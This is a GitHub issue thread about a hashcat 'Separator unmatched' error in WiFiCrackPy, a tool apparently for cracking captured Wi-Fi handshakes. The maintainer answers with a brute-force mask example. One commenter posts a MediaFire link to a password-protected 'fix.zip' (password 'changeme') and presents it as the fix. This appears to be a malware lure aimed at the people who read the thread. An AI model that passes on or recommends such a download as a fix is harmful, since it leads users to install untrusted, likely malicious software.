### ISSUE TITLE
Hash 'capture.hc22000': Separator unmatched No hashes loaded.

### ISSUE THREAD

**Issue by K0g1** [phenotypic/WiFiCrackPy#33]
Once I get the handshake, no matter what attack mode I choose, it always crashes instantly with this error message:

Hash 'capture.hc22000': Separator unmatched
No hashes loaded.

<img width="752" alt="Screenshot 2024-08-26 at 12 35 27 AM" src="https://github.com/user-attachments/assets/6fab29e9-6e01-4bee-93de-bc461df8236d">

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by phenotypic** [comment]
Hi there, you need to provide a recognised [brute-force pattern](https://hashcat.net/wiki/doku.php?id=mask_attack).

For example, `?l?l?l`.
